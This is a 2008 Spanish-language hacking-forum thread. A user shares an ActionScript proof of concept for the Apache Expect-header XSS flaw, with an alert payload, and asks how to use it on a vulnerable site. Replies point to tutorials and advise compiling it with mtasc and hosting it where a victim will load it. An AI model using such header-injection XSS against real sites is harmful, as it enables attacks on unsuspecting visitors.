Duda exploit Apache Expect XSS

& eDu & · 18 Mayo 2008, 12:08 PM

Bueno tengo este exploit

var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");

y quiero explotarlo en una web vulnerable a el, pero no se como, si lo saben diganmelo. Gracias

Azielito · 19 Mayo 2008, 18:59 PM

Pues que sistema es ese?

a simple vista es una web hecha en AJAX y ese es codigo javascript, pos la puees ejecutar desde la barra de direcciones

Código (javascript) [Seleccionar]

javascript:var req:LoadVars=new LoadVars();req.addRequestHeader("Expect","<script>alert('gotcha!')</script>");req.send("http://www.target.site/","_blank","GET");

pero debes encontrar esa web vulnerable, de donde sacaste ese codigo?
o sea, pasa la url para ver para que sistema es xD

& eDu & · 19 Mayo 2008, 19:17 PM

x.es
¿Que pongo en la url
www.x.es/javascript:var req:LoadVars=new LoadVars();req.addRequestHeader("Expect","<script>alert('gotcha!')</script>");req.send("http://www.target.site/","_blank","GET")

?

Azielito · 19 Mayo 2008, 20:21 PM

mmmhhh.. no, vas a tener que cargar el JS dara error por el ":" del var req:LoadVars ¬¬

Mirate los post pegados para que entiendas mejor de que se trata...

no recuerdo si hay info sobre eso xDD mejor lee lo que tenemos por aca
http://www.elhacker.net/jasildbg/

Tantes que leas algo mejor lee esto que te servira bastante

http://foro.elhacker.net/bugs_y_exploits/taller_introduccion_a_los_bugs_a_nivel_web-t173509.0.html

Cuando termines de leer este entonces sigues con este

https://foro.elhacker.net/bugs_y_exploits/taller_de_introduccion_a_bugsexploits_1deg-t103198.0.html

y ya luego lees el de jasildbg

sirdarckcat · 20 Mayo 2008, 16:24 PM

eso es flash jaja

compila ese codigo con mtasc, y subelo a una web que vea tu victima y yap

Test Foro de elhacker.net SMF 2.1

Duda exploit Apache Expect XSS

& eDu &

Azielito

& eDu &

Azielito

sirdarckcat